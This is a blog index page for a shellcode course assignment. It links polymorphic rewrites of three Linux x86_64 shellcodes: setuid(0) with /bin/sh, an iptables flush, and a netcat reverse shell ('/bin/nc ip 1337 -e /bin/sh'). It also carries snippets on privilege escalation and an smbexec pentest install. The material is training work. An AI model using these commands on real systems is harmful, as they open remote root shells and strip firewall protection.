Skip to main content

Assignment 6

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification."
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE64-1434

Target Operating System: 64 bit Linux (x86_64 GNU/Linux)


Assignment 6:

Take up any 3 shellcodes, 64 bit Linux ones, from Shell-Storm and create polymorphic versions which do not exceed 150% of the size of the original shellcode. Bonus points if you make the polymorphic version really obscure or maybe even shorter in length than the original one.


Concerning polymorphic code detection:
https://www.fp6-noah.org/publications/papers/nemu_raid07.pdf
https://www3.cs.stonybrook.edu/~mikepo/papers/nemu.virology.pdf


I have decided that since these blog posts tend to get rather long that I will create a separate blog post for each of the 3 shellcodes that I will choose from Shell-Storm and I will simply put a link to those blog posts here.



The First Shellcode


setuid(0) + execve(/bin/sh)

The Original Shellcode: http://shell-storm.org/shellcode/files/shellcode-77.php

My Polymorphic Version: http://a41l4.blogspot.ca/2017/03/polysetuidexecve1434.html



The Second Shellcode


execve("/sbin/iptables", ["/sbin/iptables", "-F"], NULL)

The Original Shellcode: http://shell-storm.org/shellcode/files/shellcode-683.php

My Polymorphic Version: http://a41l4.blogspot.ca/2017/03/polyflushiptables1434.html


The Third shellcode


execve("/bin/nc",{"/bin/nc","ip","1337","-e","/bin/sh"},NULL)

The Original Shellcode: http://shell-storm.org/shellcode/files/shellcode-823.php

My Polymorphic Version: http://a41l4.blogspot.ca/2017/03/polynetcatrevshell1434.html


Comments

Post a Comment

Popular posts from this blog

PolySetuidExecve1434

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification." http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student ID: SLAE64-1434 Target Operating System : 64 bit Linux (x86_64 GNU/Linux) This blog post is part of Assignment 6: http://a41l4.blogspot.ca/2017/03/assignment-6.html The Original Version: http://shell-storm.org/shellcode/files/shellcode-77.php My Version: GitHub Link : https://github.com/rtaylor777/nasm/blob/master/PolySetuidExecve1434.nasm Published : https://www.exploit-db.com/exploits/41498/ Original Shellcode bytes = 49 My version: Number of bytes = 31 Number of nulls = 0 PolySetuidExecve1434.nasm Intro This shellcode when executed will first setuid(0) and then execute /bin/sh and provide you with a shell. The purpose of calling setuid(0) is, suppose that you have managed to inject this shellcode into an executable that is Set-UID root. I...
Post a Comment
Read more

PolyFlushIPTables1434

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification." http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student ID: SLAE64-1434 Target Operating System : 64 bit Linux (x86_64 GNU/Linux) This blog post is part of Assignment 6: http://a41l4.blogspot.ca/2017/03/assignment-6.html The Original Version: http://shell-storm.org/shellcode/files/shellcode-683.php Original size: 50 bytes (don't believe what he says :) My Version: GitHub Link : https://github.com/rtaylor777/nasm/blob/master/PolyFlushIPTables1434.nasm Published : https://www.exploit-db.com/exploits/41503/ My version: Number of bytes = 47 Number of nulls = 0 PolyFlushIPTables1434.nasm  Intro This shellcode basically just executes /sbin/iptables -F without any other parameters. man iptables "-F, --flush [chain]               Flush ...
Post a Comment
Read more

Smbexec Install for Kali 2016.2

This is my how-to current as of August 31, 2017 . Context Kali Linux 2016.2 after: apt-get update apt-get upgrade apt-get dist-upgrade apt auto-remove restart Reason Training, see: https://www.cybrary.it/course/advanced-penetration-testing/ Video: https://www.cybrary.it/video/post-exploitation-part-4/ Downloads cd /opt git clone https://github.com/pentestgeek/smbexec.git git clone https://github.com/libyal/libesedb.git git clone https://github.com/csababarta/ntdsxtract /opt/NTDSXtract wget https://raw.githubusercontent.com/infoassure/dumpntds/master/dshashes.py -O /opt/NTDSXtract/dshashes.py Install Required Tools/Libraries apt-get install automake autoconf autopoint gcc-mingw-w64-x86-64 libtool pkg-config passing-the-hash ruby-nokogiri ruby-libxml libxml2-dev libxslt1-dev Build libesbdb cd /opt/libesedb/ ./synclibs.sh ./autogen.sh ./configure make Install Bundler gem install bundler   Install Smbexec First edit the file /opt/smbexec/smbe...
Post a Comment
Read more